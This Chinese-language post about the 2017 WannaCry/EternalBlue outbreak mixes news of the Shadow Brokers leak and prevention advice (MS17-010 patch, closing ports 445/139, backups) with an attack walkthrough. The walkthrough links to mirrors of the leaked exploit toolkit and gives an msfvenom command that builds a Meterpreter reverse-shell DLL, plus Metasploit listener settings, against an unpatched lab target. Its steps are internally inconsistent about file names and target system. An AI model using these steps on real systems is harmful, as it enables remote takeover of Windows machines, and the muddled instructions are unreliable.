永恒之藍,永恒之藍勒索病毒,中了永恒之藍病毒勒索怎么辦?
永恒
如果確定,已經中了勒索病毒,那么無藥可救,因為他的加密方式,和RAR加密一樣,除了字典辦法沒辦法破解,當初可以等國外技術大神,出破解他加密軟件的辦法。
我們來看看他的侵入方法:
Shadow Brokers再次泄露出一份震驚世界的機密文檔,其中包含了多個精美的 Windows 遠程漏洞利用工具,可以覆蓋大量的 Windows 服務器,一夜之間所有Windows服務器幾乎全線暴露在危險之中,任何人都可以直接下載并遠程攻擊利用,考慮到國內不少高校、政府、國企甚至還有一些互聯(lián)網公司還在使用 Windows 服務器,這次事件影響力堪稱網絡大地震。
目前已知受影響的 Windows 版本包括但不限于:Windows NT,Windows 2000(沒錯,古董也支持)、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
故事還要從一年前說起,2016 年 8 月有一個 “Shadow Brokers” 的黑客組織號稱入侵了方程式組織竊取了大量機密文件,并將部分文件公開到了互聯(lián)網上,方程式(Equation Group)據(jù)稱是 NSA(美國國家安全局)下屬的黑客組織,有著極高的技術手段。這部分被公開的文件包括不少隱蔽的地下的黑客工具。另外 “Shadow Brokers” 還保留了部分文件,打算以公開拍賣的形式出售給出價最高的競價者,“Shadow Brokers” 預期的價格是 100 萬比特幣(價值接近5億美金)。這一切聽起來難以置信,以至于當時有不少安全專家對此事件保持懷疑態(tài)度,“Shadow Brokers” 的拍賣也因此一直沒有成功。
北京時間 2017 年 4 月 14 日晚,“Shadow Brokers” 終于忍不住了,在推特上放出了他們當時保留的部分文件,解壓密碼是 “Reeeeeeeeeeeeeee”。
方程式ETERNALBLUE 下載地址
推特 https://yadi.sk/d/NJqzpqo_3GxZA4
github https://github.com/x0rz/EQGRP_Lost_in_Translation
Pyhthon環(huán)境配置
python-2.6.6.msi https://www.python.org/download/releases/2.6.6/
win32模塊文件pywin32-221.win-amd64-py2.6.exe 鏈接: https://pan.baidu.com/s/1nu8KXPB 密碼: hy7e
機器
攻擊機器Windows 7:192.168.1.108
攻擊機器Ubuntu :192.168.1.109
目標機器Windows 7 x64(沒安裝過SBM補丁的,并且關閉防火墻):192.168.1.113
利用msf生成dll劫持文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=6566 -f dll > /opt/x.dll
將s.dll文件拷貝到windows2003的C盤目錄下:
在msf下開啟msfpaylod監(jiān)聽:
use exploit/multi/handler
set LHOST 192.168.1.109
set LPORT 6566
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
使用exp里執(zhí)行dll,就可以看到test.dll 反彈給Ubuntu的shell了。
除 Windows 以外,“Shadow Brokers” 泄露的數(shù)據(jù)還顯示方程式攻擊了中東一些使用了 Swift 銀行結算系統(tǒng)的銀行。
緩解措施
所有 Windows 服務器、個人電腦,包括 XP/2003/Win7/Win8,Win 10 最好也不要漏過,全部使用防火墻過濾/關閉 137、139、445端口;對于 3389 遠程登錄,如果不想關閉的話,至少要關閉智能卡登錄功能。
5月12日下午,編輯曾在讀者群眾收到爆料,有一高校學生的電腦中了勒索病毒,且勒索內容太特別搞笑:要求盡快支付勒索贖金,否則將刪除文件,甚至提出半年后如果還沒支付的窮人可以參加免費解壓的活動。原來以為這只是個小范圍的惡作劇式的勒索軟件,沒想到昨晚該勒索軟件大面積爆發(fā),許多高校學生中招,愈演愈烈。
今早,雷鋒網發(fā)現(xiàn),原來,5月12日起,全球范圍內爆發(fā)基于Windows網絡共享協(xié)議進行攻擊傳播的蠕蟲惡意代碼,這是不法分子通過改造之前泄露的NSA黑客武器庫中“永恒之藍”攻擊程序發(fā)起的網絡攻擊事件,用戶只要開機上網就可被攻擊。五個小時內,包括英國、俄羅斯、整個歐洲以及國內多個高校校內網、大型企業(yè)內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復文件,對重要數(shù)據(jù)造成嚴重損失。
最可怕的是,這是不法分子利用NSA黑客武器庫泄漏的“永恒之藍”發(fā)起的蠕蟲病毒攻擊傳播勒索惡意事件。惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。
近日,多個高校淪陷于比特幣病毒。這種病毒致使許多高校畢業(yè)生的畢業(yè)論文(設計)被鎖,支付高額贖金后才能解密。
根據(jù)網絡安全機構通報,這是不法分子利用NSA黑客武器庫泄漏的“永恒之藍”發(fā)起的病毒攻擊事件。“永恒之藍”會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦遠程木馬控制并攻擊。據(jù)有關機構統(tǒng)計,目前國內平均每天有5000多臺機器遭到NSA“永恒之藍”黑客武器的遠程攻擊,教育網就是受攻擊的重災區(qū)!
為了防范病毒,請遵守以下防范措施:
1、為計算機安裝最新的安全補丁,微軟已發(fā)布補丁MS17-010修復了“永恒之藍”攻擊的系統(tǒng)漏洞,請盡快安裝此安全補丁,網址為O網頁鏈接。
2、關閉445、135、137、138、139端口,關閉網絡共享。
3、強化網絡安全意識:不明鏈接不要點擊,不明文件不要下載,不明郵件不要打開。
4、盡快(今后定期)備份自己電腦中的重要文件資料到移動硬盤、U盤,備份完后脫機保存該磁盤。
5、建議仍在使用windows xp, windows 2003操作系統(tǒng)的用戶盡快升級到 window 7/windows 10,或 windows 2008/2012/2016操作系統(tǒng)。
6、安裝正版操作系統(tǒng)、Office軟件等。
在此,校會提示:一定要做好對比特幣病毒的防范!謹慎使用電腦,特別是對于校園網和教育網的使用!重要文件及時在網盤備份,尤其是即將進行畢業(yè)答辯的師兄師姐及搞科研的同學和老師,一定要保護好自己的畢業(yè)論文和科研論文等文件
0 Comments.